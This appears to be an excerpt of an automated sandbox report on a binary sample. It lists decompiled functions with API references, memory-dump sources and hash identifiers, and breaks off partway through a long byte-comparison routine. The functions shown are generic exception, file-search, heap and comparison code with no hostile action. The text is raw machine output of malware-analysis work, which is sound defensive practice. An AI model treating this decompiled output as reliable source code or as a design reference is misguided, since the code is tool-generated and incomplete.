                        • Instruction Fuzzy Hash: 32416E75A00205BFCB00DFA8CD88E9E7BB5EF49354F204169F905EB2D1CA799C41CB94
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 10009B60, Relevance: 3.0, APIs: 2, Instructions: 8COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E10009B60(struct _EXCEPTION_POINTERS* _a4) {

				SetUnhandledExceptionFilter(0);
				return UnhandledExceptionFilter(_a4);
			}



                        0x10009b65
                        0x10009b75

                        APIs
                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,100083A0,?,?,?,00000001), ref: 10009B65
                        • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 10009B6E
                        Memory Dump Source
                        • Source File: 00000000.00000002.354904922.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.354899107.0000000010000000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.354953530.0000000010014000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.354975376.000000001001A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.354995139.000000001001F000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: ExceptionFilterUnhandled
                        • String ID:
                        • API String ID: 3192549508-0
                        • Opcode ID: a697bdc71d203b9f456a57b6a4a54f7fcec766da0a92eb1a21c99988ea9ad20c
                        • Instruction ID: da3e3afb2c25b0a0540a25bf0d7440b82a0605ab0f9bac42e4bc2f1476fd9acf
                        • Opcode Fuzzy Hash: a697bdc71d203b9f456a57b6a4a54f7fcec766da0a92eb1a21c99988ea9ad20c
                        • Instruction Fuzzy Hash: 7AB0923104521CBBEE402B91DC49BA87F28EB06666F088010F60D4A060CB7297508B93
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00402671, Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                        Download Yara Rule
                        C-Code - Quality: 39%
                        			E00402671(char __ebx, char* __edi, char* __esi) {
				void* _t19;

				if(FindFirstFileA(E00402A29(2), _t19 - 0x19c) != 0xffffffff) {
					E00405AF6(__edi, _t6);
					_push(_t19 - 0x170);
					_push(__esi);
					E00405B98();
				} else {
					 *__edi = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}




                        0x00402689
                        0x0040269d
                        0x004026a8
                        0x004026a9
                        0x004027e4
                        0x0040268b
                        0x0040268b
                        0x0040268d
                        0x0040268f
                        0x0040268f
                        0x004028c1
                        0x004028cd

                        APIs
                        • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402680
                        Memory Dump Source
                        • Source File: 00000000.00000002.352449579.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.352433071.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352490534.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352519331.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352647992.0000000000422000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352679041.000000000042A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352707712.000000000042D000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: FileFindFirst
                        • String ID:
                        • API String ID: 1974802433-0
                        • Opcode ID: c707d325fcd64eef76be24f413fce74fcf29a9d2c757c0b7f3e21b108dde0476
                        • Instruction ID: c4b8fb32876d586bcf7df686e34757fa561d471cbaf363f6388d0c393702730c
                        • Opcode Fuzzy Hash: c707d325fcd64eef76be24f413fce74fcf29a9d2c757c0b7f3e21b108dde0476
                        • Instruction Fuzzy Hash: 81F0A032A041009ED711EBA49A499EEB7789B11318F60067BE101B21C1C6B859459B2A
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 100098C2, Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E100098C2() {
				void* _t3;

				_t3 = GetProcessHeap();
				 *0x1001da80 = _t3;
				return 0 | _t3 != 0x00000000;
			}




                        0x100098c2
                        0x100098ca
                        0x100098d6

                        APIs
                        • GetProcessHeap.KERNEL32(10012851,10019678,00000008,10012A29,?,00000001,?,10019698,0000000C,10012AF9,?,00000001,?), ref: 100098C2
                        Memory Dump Source
                        • Source File: 00000000.00000002.354904922.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.354899107.0000000010000000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.354953530.0000000010014000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.354975376.000000001001A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.354995139.000000001001F000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: HeapProcess
                        • String ID:
                        • API String ID: 54951025-0
                        • Opcode ID: 1acaa70a90663132ae19a66ae4cbb9a4e22590ba082660556cccd569f6593cc9
                        • Instruction ID: 3c141ac153803f1ef25ed50dae46ff0e6f7a9d2cada789bf9762fa24e2ea9563
                        • Opcode Fuzzy Hash: 1acaa70a90663132ae19a66ae4cbb9a4e22590ba082660556cccd569f6593cc9
                        • Instruction Fuzzy Hash: B0B012F030A12347E7085B385C9811935D46B08212344803EF403C5560DF30C650BB05
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 100066F2, Relevance: .3, Instructions: 345COMMONCrypto
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E100066F2(void* __edx, void* __esi) {
				signed int _t192;
				signed char _t193;
				signed char _t194;
				signed char _t195;
				signed char _t196;
				signed char _t198;
				signed int _t241;
				void* _t287;
				void* _t292;
				void* _t294;
				void* _t296;
				void* _t298;
				void* _t300;
				void* _t302;
				void* _t304;
				void* _t306;
				void* _t308;
				void* _t310;
				void* _t312;
				void* _t314;
				void* _t316;
				void* _t318;
				void* _t320;
				void* _t322;
				void* _t324;
				void* _t326;
				void* _t327;

				_t327 = __esi;
				_t287 = __edx;
				if( *((intOrPtr*)(__esi - 0x1e)) ==  *((intOrPtr*)(__edx - 0x1e))) {
					_t241 = 0;
					L15:
					if(_t241 != 0) {
						goto L2;
					}
					_t193 =  *(_t327 - 0x1a);
					if(_t193 ==  *(_t287 - 0x1a)) {
						_t241 = 0;
						L26:
						if(_t241 != 0) {
							goto L2;
						}
						_t194 =  *(_t327 - 0x16);
						if(_t194 ==  *(_t287 - 0x16)) {
							_t241 = 0;
							L37:
							if(_t241 != 0) {
								goto L2;
							}
							_t195 =  *(_t327 - 0x12);
							if(_t195 ==  *(_t287 - 0x12)) {
								_t241 = 0;
								L48:
								if(_t241 != 0) {
									goto L2;
								}
								_t196 =  *(_t327 - 0xe);
								if(_t196 ==  *(_t287 - 0xe)) {
									_t241 = 0;
									L59:
									if(_t241 != 0) {
										goto L2;
									}
									if( *(_t327 - 0xa) ==  *(_t287 - 0xa)) {
										_t241 = 0;
										L70:
										if(_t241 != 0) {
											goto L2;
										}
										_t198 =  *(_t327 - 6);
										if(_t198 ==  *(_t287 - 6)) {
											_t241 = 0;
											L81:
											if(_t241 == 0 &&  *((intOrPtr*)(_t327 - 2)) ==  *((intOrPtr*)(_t287 - 2))) {
											}
											goto L2;
										}
										_t292 = (_t198 & 0x000000ff) - ( *(_t287 - 6) & 0x000000ff);
										if(_t292 == 0) {
											L74:
											_t294 = ( *(_t327 - 5) & 0x000000ff) - ( *(_t287 - 5) & 0x000000ff);
											if(_t294 == 0) {
												L76:
												_t296 = ( *(_t327 - 4) & 0x000000ff) - ( *(_t287 - 4) & 0x000000ff);
												if(_t296 == 0) {
													L78:
													_t241 = ( *(_t327 - 3) & 0x000000ff) - ( *(_t287 - 3) & 0x000000ff);
													if(_t241 != 0) {
														_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
													}
													goto L81;
												}
												_t241 = (0 | _t296 > 0x00000000) * 2 - 1;
												if(_t241 != 0) {
													goto L2;
												}
												goto L78;
											}
											_t241 = (0 | _t294 > 0x00000000) * 2 - 1;
											if(_t241 != 0) {
												goto L2;
											}
											goto L76;
										}
										_t241 = (0 | _t292 > 0x00000000) * 2 - 1;
										if(_t241 != 0) {
											goto L2;
										}
										goto L74;
									}
									_t298 = ( *(_t327 - 0xa) & 0x000000ff) - ( *(_t287 - 0xa) & 0x000000ff);
									if(_t298 == 0) {
										L63:
										_t300 = ( *(_t327 - 9) & 0x000000ff) - ( *(_t287 - 9) & 0x000000ff);
										if(_t300 == 0) {
											L65:
											_t302 = ( *(_t327 - 8) & 0x000000ff) - ( *(_t287 - 8) & 0x000000ff);
											if(_t302 == 0) {
												L67:
												_t241 = ( *(_t327 - 7) & 0x000000ff) - ( *(_t287 - 7) & 0x000000ff);
												if(_t241 != 0) {
													_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
												}
												goto L70;
											}
											_t241 = (0 | _t302 > 0x00000000) * 2 - 1;
											if(_t241 != 0) {
												goto L2;
											}
											goto L67;
										}
										_t241 = (0 | _t300 > 0x00000000) * 2 - 1;
										if(_t241 != 0) {
											goto L2;
										}
										goto L65;
									}
									_t241 = (0 | _t298 > 0x00000000) * 2 - 1;
									if(_t241 != 0) {
										goto L2;
									}
									goto L63;
								}
								_t304 = (_t196 & 0x000000ff) - ( *(_t287 - 0xe) & 0x000000ff);
								if(_t304 == 0) {
									L52:
									_t306 = ( *(_t327 - 0xd) & 0x000000ff) - ( *(_t287 - 0xd) & 0x000000ff);
									if(_t306 == 0) {
										L54:
										_t308 = ( *(_t327 - 0xc) & 0x000000ff) - ( *(_t287 - 0xc) & 0x000000ff);
										if(_t308 == 0) {
											L56:
											_t241 = ( *(_t327 - 0xb) & 0x000000ff) - ( *(_t287 - 0xb) & 0x000000ff);
											if(_t241 != 0) {
												_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
											}
											goto L59;
										}
										_t241 = (0 | _t308 > 0x00000000) * 2 - 1;
										if(_t241 != 0) {
											goto L2;
										}
										goto L56;
									}
									_t241 = (0 | _t306 > 0x00000000) * 2 - 1;
									if(_t241 != 0) {
										goto L2;
									}
									goto L54;
								}
								_t241 = (0 | _t304 > 0x00000000) * 2 - 1;
								if(_t241 != 0) {
									goto L2;
								}
								goto L52;
							}
							_t310 = (_t195 & 0x000000ff) - ( *(_t287 - 0x12) & 0x000000ff);
							if(_t310 == 0) {
								L41:
								_t312 = ( *(_t327 - 0x11) & 0x000000ff) - ( *(_t287 - 0x11) & 0x000000ff);
								if(_t312 == 0) {
									L43:
									_t314 = ( *(_t327 - 0x10) & 0x000000ff) - ( *(_t287 - 0x10) & 0x000000ff);
									if(_t314 == 0) {
										L45:
										_t241 = ( *(_t327 - 0xf) & 0x000000ff) - ( *(_t287 - 0xf) & 0x000000ff);
										if(_t241 != 0) {
											_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
										}
										goto L48;
									}
									_t241 = (0 | _t314 > 0x00000000) * 2 - 1;
									if(_t241 != 0) {
										goto L2;
									}
									goto L45;
								}
								_t241 = (0 | _t312 > 0x00000000) * 2 - 1;
								if(_t241 != 0) {
									goto L2;
								}
								goto L43;
							}
							_t241 = (0 | _t310 > 0x00000000) * 2 - 1;
							if(_t241 != 0) {
								goto L2;
							}
							goto L41;
						}
						_t316 = (_t194 & 0x000000ff) - ( *(_t287 - 0x16) & 0x000000ff);
						if(_t316 == 0) {
							L30:
							_t318 = ( *(_t327 - 0x15) & 0x000000ff) - ( *(_t287 - 0x15) & 0x000000ff);
							if(_t318 == 0) {
								L32:
								_t320 = ( *(_t327 - 0x14) & 0x000000ff) - ( *(_t287 - 0x14) & 0x000000ff);
								if(_t320 == 0) {
									L34:
									_t241 = ( *(_t327 - 0x13) & 0x000000ff) - ( *(_t287 - 0x13) & 0x000000ff);
									if(_t241 != 0) {
										_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
									}
									goto L37;
								}
								_t241 = (0 | _t320 > 0x00000000) * 2 - 1;
								if(_t241 != 0) {
									goto L2;
								}
								goto L34;
							}
							_t241 = (0 | _t318 > 0x00000000) * 2 - 1;
							if(_t241 != 0) {
								goto L2;
							}
							goto L32;
						}
						_t241 = (0 | _t316 > 0x00000000) * 2 - 1;
						if(_t241 != 0) {
							goto L2;
						}
						goto L30;
					}
					_t322 = (_t193 & 0x000000ff) - ( *(_t287 - 0x1a) & 0x000000ff);
					if(_t322 == 0) {
						L19:
						_t324 = ( *(_t327 - 0x19) & 0x000000ff) - ( *(_t287 - 0x19) & 0x000000ff);
						if(_t324 == 0) {
							L21:
							_t326 = ( *(_t327 - 0x18) & 0x000000ff) - ( *(_t287 - 0x18) & 0x000000ff);
							if(_t326 == 0) {
								L23:
								_t241 = ( *(_t327 - 0x17) & 0x000000ff) - ( *(_t287 - 0x17) & 0x000000ff);
								if(_t241 != 0) {
									_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
								}
								goto L26;
							}
							_t241 = (0 | _t326 > 0x00000000) * 2 - 1;
							if(_t241 != 0) {
								goto L2;
							}
							goto L23;
						}
						_t241 = (0 | _t324 > 0x00000000) * 2 - 1;
						if(_t241 != 0) {
							goto L2;
						}
						goto L21;
					}
					_t241 = (0 | _t322 > 0x00000000) * 2 - 1;
					if(_t241 != 0) {
						goto L2;
					}
					goto L19;
				} else {
					__edi = __al & 0x000000ff;
					__edi = (__al & 0x000000ff) - ( *(__edx - 0x1e) & 0x000000ff);
					if(__edi == 0) {
						L8:
						__edi =  *(__esi - 0x1d) & 0x000000ff;
						__edi = ( *(__esi - 0x1d) & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
						if(__edi == 0) {
							L10:
							__edi =  *(__esi - 0x1c) & 0x000000ff;
							__edi = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
							if(__edi == 0) {
								L12:
								__ecx =  *(__esi - 0x1b) & 0x000000ff;
								__ecx = ( *(__esi - 0x1b) & 0x000000ff) - ( *(__edx - 0x1b) & 0x000000ff);
								if(__ecx != 0) {
									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
								}
								goto L15;
							}
							0 = 0 | __edi > 0x00000000;
							__ecx = (__edi > 0) * 2 != 1;
							if((__edi > 0) * 2 != 1) {
								L2:
								_t192 = _t241;
								return _t192;
							}
							goto L12;
						}
						0 = 0 | __edi > 0x00000000;
						__ecx = (__edi > 0) * 2 != 1;
						if((__edi > 0) * 2 != 1) {
							goto L2;
						}
						goto L10;
					}
					0 = 0 | __edi > 0x00000000;
					__ecx = (__edi > 0) * 2 != 1;
					if((__edi > 0) * 2 != 1) {
						goto L2;
					}
					goto L8;
				}
			}






























                        0x100066f2
                        0x100066f2
                        0x100066f8
                        0x1000677f
                        0x10006781
                        0x10006783
                        0x00000000
                        0x00000000
                        0x10006789
                        0x1000678f
                        0x10006816
                        0x10006818
                        0x1000681a
                        0x00000000
                        0x00000000
                        0x10006820
                        0x10006826
                        0x100068ad
                        0x100068af
                        0x100068b1
                        0x00000000
                        0x00000000
                        0x100068b7
                        0x100068bd
                        0x10006944
                        0x10006946
                        0x10006948
                        0x00000000
                        0x00000000
                        0x1000694e
                        0x10006954
                        0x100069db
                        0x100069dd
                        0x100069df
                        0x00000000
                        0x00000000
                        0x100069eb
                        0x10006a73
                        0x10006a75
                        0x10006a77
                        0x00000000
                        0x00000000
                        0x10006a7d
                        0x10006a83
                        0x10006b0a
                        0x10006b0c
                        0x10006b0e
                        0x10006b0e
                        0x00000000
                        0x10006b0e
                        0x10006a90
                        0x10006a92
                        0x10006aaa
                        0x10006ab2
                        0x10006ab4
                        0x10006acc
                        0x10006ad4
                        0x10006ad6
                        0x10006aee
                        0x10006af6
                        0x10006af8
                        0x10006b01
                        0x10006b01
                        0x00000000
                        0x10006af8
                        0x10006adf
                        0x10006ae8
                        0x00000000
                        0x00000000
                        0x00000000
                        0x10006ae8
                        0x10006abd
                        0x10006ac6
                        0x00000000
                        0x00000000
                        0x00000000
                        0x10006ac6
                        0x10006a9b
                        0x10006aa4
                        0x00000000
                        0x00000000
                        0x00000000
                        0x10006aa4
                        0x100069f9
                        0x100069fb
                        0x10006a13
                        0x10006a1b
                        0x10006a1d
                        0x10006a35
                        0x10006a3d
                        0x10006a3f
                        0x10006a57
                        0x10006a5f
                        0x10006a61
                        0x10006a6a
                        0x10006a6a
                        0x00000000
                        0x10006a61
                        0x10006a48
                        0x10006a51
                        0x00000000
                        0x00000000
                        0x00000000
                        0x10006a51
                        0x10006a26
                        0x10006a2f
                        0x00000000
                        0x00000000
                        0x00000000
                        0x10006a2f
                        0x10006a04
                        0x10006a0d
                        0x00000000
                        0x00000000
                        0x00000000
                        0x10006a0d
                        0x10006961
                        0x10006963
                        0x1000697b
                        0x10006983
                        0x10006985
                        0x1000699d
                        0x100069a5
                        0x100069a7
                        0x100069bf
                        0x100069c7
                        0x100069c9
                        0x100069d2
                        0x100069d2
                        0x00000000
                        0x100069c9
                        0x100069b0
                        0x100069b9
                        0x00000000
                        0x00000000
                        0x00000000
                        0x100069b9
                        0x1000698e
                        0x10006997
                        0x00000000
                        0x00000000
                        0x00000000
                        0x10006997
                        0x1000696c
                        0x10006975
                        0x00000000
                        0x00000000
                        0x00000000
                        0x10006975
                        0x100068ca
                        0x100068cc
                        0x100068e4
                        0x100068ec
                        0x100068ee
                        0x10006906
                        0x1000690e
                        0x10006910
                        0x10006928
                        0x10006930
                        0x10006932
                        0x1000693b
                        0x1000693b
                        0x00000000
                        0x10006932
                        0x10006919
                        0x10006922
                        0x00000000
                        0x00000000
                        0x00000000
                        0x10006922
                        0x100068f7
                        0x10006900
                        0x00000000
                        0x00000000
                        0x00000000
                        0x10006900
                        0x100068d5
                        0x100068de
                        0x00000000
                        0x00000000
                        0x00000000
                        0x100068de
                        0x10006833
                        0x10006835
                        0x1000684d
                        0x10006855
                        0x10006857
                        0x1000686f
                        0x10006877
                        0x10006879
                        0x10006891
                        0x10006899
                        0x1000689b
                        0x100068a4
                        0x100068a4
                        0x00000000
                        0x1000689b
                        0x10006882
                        0x1000688b
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1000688b
                        0x10006860
                        0x10006869
                        0x00000000
                        0x00000000
                        0x00000000
                        0x10006869
                        0x1000683e
                        0x10006847
                        0x00000000
                        0x00000000
                        0x00000000
                        0x10006847
                        0x1000679c
                        0x1000679e
                        0x100067b6
                        0x100067be
                        0x100067c0
                        0x100067d8
                        0x100067e0
                        0x100067e2
                        0x100067fa
                        0x10006802
                        0x10006804
                        0x1000680d
                        0x1000680d
                        0x00000000
                        0x10006804
                        0x100067eb
                        0x100067f4
                        0x00000000
                        0x00000000
                        0x00000000
                        0x100067f4
                        0x100067c9
                        0x100067d2
                        0x00000000
                        0x00000000
                        0x00000000
                        0x100067d2
                        0x100067a7
                        0x100067b0
                        0x00000000
                        0x00000000
                        0x00000000
                        0x100066fe
                        0x100066fe
                        0x10006705
                        0x10006707
                        0x1000671f
                        0x1000671f
                        0x10006727
                        0x10006729
                        0x10006741
                        0x10006741
                        0x10006749
                        0x1000674b
                        0x10006763
                        0x10006763
                        0x1000676b
                        0x1000676d
                        0x10006776
                        0x10006776
                        0x00000000
                        0x1000676d
                        0x10006751
                        0x10006754
                        0x1000675d
                        0x100062b5
                        0x100062b5
                        0x100070a6
                        0x100070a6
                        0x00000000
                        0x1000675d
                        0x1000672f
                        0x10006732
                        0x1000673b
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1000673b
                        0x1000670d
                        0x10006710
                        0x10006719
                        0x00000000
                        0x00000000
                        0x00000000
                        0x10006719

                        Memory Dump Source
                        • Source File: 00000000.00000002.354904922.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.354899107.0000000010000000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.354953530.0000000010014000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.354975376.000000001001A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.354995139.000000001001F000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                        • Instruction ID: 59b9ccafa3af49cd88bbdd7374fc6b5821e1434ac54296cd17ea50948520c0ff
                        • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                        • Instruction Fuzzy Hash: 9FC1633220959309EB4DCA79887413EBBE2DB966F1327576DD4B2DF1D8EF20C524DA20
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 10006B27, Relevance: .3, Instructions: 341COMMONCrypto
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E10006B27(void* __edx, void* __esi) {
				signed int _t197;
				signed char _t198;
				signed char _t199;
				signed char _t200;
				signed char _t202;
				signed char _t203;
				signed int _t246;
				void* _t294;
				void* _t297;
				void* _t299;
				void* _t301;
				void* _t303;
				void* _t305;
				void* _t307;
				void* _t309;
				void* _t311;
				void* _t313;
				void* _t315;
				void* _t317;
				void* _t319;
				void* _t321;
				void* _t323;
				void* _t325;
				void* _t327;
				void* _t329;
				void* _t331;
				void* _t333;
				void* _t335;
				void* _t336;

				_t336 = __esi;
				_t294 = __edx;
				if( *((intOrPtr*)(__esi - 0x1f)) ==  *((intOrPtr*)(__edx - 0x1f))) {
					_t246 = 0;
					L14:
					if(_t246 != 0) {
						goto L1;
					}
					_t198 =  *(_t336 - 0x1b);
					if(_t198 ==  *(_t294 - 0x1b)) {
						_t246 = 0;
						L25:
						if(_t246 != 0) {
							goto L1;
						}
						_t199 =  *(_t336 - 0x17);
						if(_t199 ==  *(_t294 - 0x17)) {
							_t246 = 0;
							L36:
							if(_t246 != 0) {
								goto L1;
							}
							_t200 =  *(_t336 - 0x13);
							if(_t200 ==  *(_t294 - 0x13)) {
								_t246 = 0;
								L47:
								if(_t246 != 0) {
									goto L1;
								}
								if( *(_t336 - 0xf) ==  *(_t294 - 0xf)) {
									_t246 = 0;
									L58:
									if(_t246 != 0) {
										goto L1;
									}
									_t202 =  *(_t336 - 0xb);
									if(_t202 ==  *(_t294 - 0xb)) {
										_t246 = 0;
										L69:
										if(_t246 != 0) {
											goto L1;
										}
										_t203 =  *(_t336 - 7);
										if(_t203 ==  *(_t294 - 7)) {
											_t246 = 0;
											L80:
											if(_t246 != 0) {
												goto L1;
											}
											_t297 = ( *(_t336 - 3) & 0x000000ff) - ( *(_t294 - 3) & 0x000000ff);
											if(_t297 == 0) {
												L83:
												_t299 = ( *(_t336 - 2) & 0x000000ff) - ( *(_t294 - 2) & 0x000000ff);
												if(_t299 == 0) {
													L3:
													_t246 = ( *(_t336 - 1) & 0x000000ff) - ( *(_t294 - 1) & 0x000000ff);
													if(_t246 != 0) {
														_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
													}
													goto L1;
												}
												_t246 = (0 | _t299 > 0x00000000) * 2 - 1;
												if(_t246 != 0) {
													goto L1;
												} else {
													goto L3;
												}
											}
											_t246 = (0 | _t297 > 0x00000000) * 2 - 1;
											if(_t246 != 0) {
												goto L1;
											}
											goto L83;
										}
										_t301 = (_t203 & 0x000000ff) - ( *(_t294 - 7) & 0x000000ff);
										if(_t301 == 0) {
											L73:
											_t303 = ( *(_t336 - 6) & 0x000000ff) - ( *(_t294 - 6) & 0x000000ff);
											if(_t303 == 0) {
												L75:
												_t305 = ( *(_t336 - 5) & 0x000000ff) - ( *(_t294 - 5) & 0x000000ff);
												if(_t305 == 0) {
													L77:
													_t246 = ( *(_t336 - 4) & 0x000000ff) - ( *(_t294 - 4) & 0x000000ff);
													if(_t246 != 0) {
														_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
													}
													goto L80;
												}
												_t246 = (0 | _t305 > 0x00000000) * 2 - 1;
												if(_t246 != 0) {
													goto L1;
												}
												goto L77;
											}
											_t246 = (0 | _t303 > 0x00000000) * 2 - 1;
											if(_t246 != 0) {
												goto L1;
											}
											goto L75;
										}
										_t246 = (0 | _t301 > 0x00000000) * 2 - 1;
										if(_t246 != 0) {
											goto L1;
										}
										goto L73;
									}
									_t307 = (_t202 & 0x000000ff) - ( *(_t294 - 0xb) & 0x000000ff);
									if(_t307 == 0) {
										L62:
										_t309 = ( *(_t336 - 0xa) & 0x000000ff) - ( *(_t294 - 0xa) & 0x000000ff);
										if(_t309 == 0) {
											L64:
											_t311 = ( *(_t336 - 9) & 0x000000ff) - ( *(_t294 - 9) & 0x000000ff);
											if(_t311 == 0) {
												L66:
												_t246 = ( *(_t336 - 8) & 0x000000ff) - ( *(_t294 - 8) & 0x000000ff);
												if(_t246 != 0) {
													_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
												}
												goto L69;
											}
											_t246 = (0 | _t311 > 0x00000000) * 2 - 1;
											if(_t246 != 0) {
												goto L1;
											}
											goto L66;
										}
										_t246 = (0 | _t309 > 0x00000000) * 2 - 1;
										if(_t246 != 0) {
											goto L1;
										}
										goto L64;
									}
									_t246 = (0 | _t307 > 0x00000000) * 2 - 1;
									if(_t246 != 0) {
										goto L1;
									}
									goto L62;
								}
								_t313 = ( *(_t336 - 0xf) & 0x000000ff) - ( *(_t294 - 0xf) & 0x000000ff);
								if(_t313 == 0) {
									L51:
									_t315 = ( *(_t336 - 0xe) & 0x000000ff) - ( *(_t294 - 0xe) & 0x000000ff);
									if(_t315 == 0) {
										L53:
										_t317 = ( *(_t336 - 0xd) & 0x000000ff) - ( *(_t294 - 0xd) & 0x000000ff);
										if(_t317 == 0) {
											L55:
											_t246 = ( *(_t336 - 0xc) & 0x000000ff) - ( *(_t294 - 0xc) & 0x000000ff);
											if(_t246 != 0) {
												_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
											}
											goto L58;
										}
										_t246 = (0 | _t317 > 0x00000000) * 2 - 1;
										if(_t246 != 0) {
											goto L1;
										}
										goto L55;
									}
									_t246 = (0 | _t315 > 0x00000000) * 2 - 1;
									if(_t246 != 0) {
										goto L1;
									}
									goto L53;
								}
								_t246 = (0 | _t313 > 0x00000000) * 2 - 1;
								if(_t246 != 0) {
									goto L1;
								}
								goto L51;
							}
							_t319 = (_t200 & 0x000000ff) - ( *(_t294 - 0x13) & 0x000000ff);
							if(_t319 == 0) {
								L40:
								_t321 = ( *(_t336 - 0x12) & 0x000000ff) - ( *(_t294 - 0x12) & 0x000000ff);
								if(_t321 == 0) {
									L42:
									_t323 = ( *(_t336 - 0x11) & 0x000000ff) - ( *(_t294 - 0x11) & 0x000000ff);
									if(_t323 == 0) {
										L44:
										_t246 = ( *(_t336 - 0x10) & 0x000000ff) - ( *(_t294 - 0x10) & 0x000000ff);
										if(_t246 != 0) {
											_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
										}
										goto L47;
									}
									_t246 = (0 | _t323 > 0x00000000) * 2 - 1;
									if(_t246 != 0) {
										goto L1;
									}
									goto L44;
								}
								_t246 = (0 | _t321 > 0x00000000) * 2 - 1;
								if(_t246 != 0) {
									goto L1;
								}
								goto L42;
							}
							_t246 = (0 | _t319 > 0x00000000) * 2 - 1;
							if(_t246 != 0) {
								goto L1;
							}
							goto L40;
						}
						_t325 = (_t199 & 0x000000ff) - ( *(_t294 - 0x17) & 0x000000ff);
						if(_t325 == 0) {
							L29:
							_t327 = ( *(_t336 - 0x16) & 0x000000ff) - ( *(_t294 - 0x16) & 0x000000ff);
							if(_t327 == 0) {
								L31:
								_t329 = ( *(_t336 - 0x15) & 0x000000ff) - ( *(_t294 - 0x15) & 0x000000ff);
								if(_t329 == 0) {
									L33:
									_t246 = ( *(_t336 - 0x14) & 0x000000ff) - ( *(_t294 - 0x14) & 0x000000ff);
									if(_t246 != 0) {
										_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
									}
									goto L36;
								}
								_t246 = (0 | _t329 > 0x00000000) * 2 - 1;
								if(_t246 != 0) {
									goto L1;
								}
								goto L33;
							}
							_t246 = (0 | _t327 > 0x00000000) * 2 - 1;
							if(_t246 != 0) {
								goto L1;
							}
							goto L31;
						}
						_t246 = (0 | _t325 > 0x00000000) * 2 - 1;
						if(_t246 != 0) {
							goto L1;
						}
						goto L29;
					}
					_t331 = (_t198 & 0x000000ff) - ( *(_t294 - 0x1b) & 0x000000ff);
					if(_t331 == 0) {
						L18:
						_t333 = ( *(_t336 - 0x1a) & 0x000000ff) - ( *(_t294 - 0x1a) & 0x000000ff);
						if(_t333 == 0) {
							L20:
							_t335 = ( *(_t336 - 0x19) & 0x000000ff) - ( *(_t294 - 0x19) & 0x000000ff);
							if(_t335 == 0) {
								L22:
								_t246 = ( *(_t336 - 0x18) & 0x000000ff) - ( *(_t294 - 0x18) & 0x000000ff);
								if(_t246 != 0) {
									_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
								}
								goto L25;
							}
							_t246 = (0 | _t335 > 0x00000000) * 2 - 1;
							if(_t246 != 0) {
								goto L1;
							}
							goto L22;
						}
						_t246 = (0 | _t333 > 0x00000000) * 2 - 1;
						if(_t246 != 0) {
							goto L1;
						}
						goto L20;
					}
					_t246 = (0 | _t331 > 0x00000000) * 2 - 1;
					if(_t246 != 0) {
						goto L1;
					}
					goto L18;
				} else {
					__edi =  *(__esi - 0x1f) & 0x000000ff;
					__edi = ( *(__esi - 0x1f) & 0x000000ff) - ( *(__edx - 0x1f) & 0x000000ff);
					if(__edi == 0) {
						L7:
						__edi =  *(__esi - 0x1e) & 0x000000ff;
						__edi = ( *(__esi - 0x1e) & 0x000000ff) - ( *(__edx - 0x1e) & 0x000000ff);
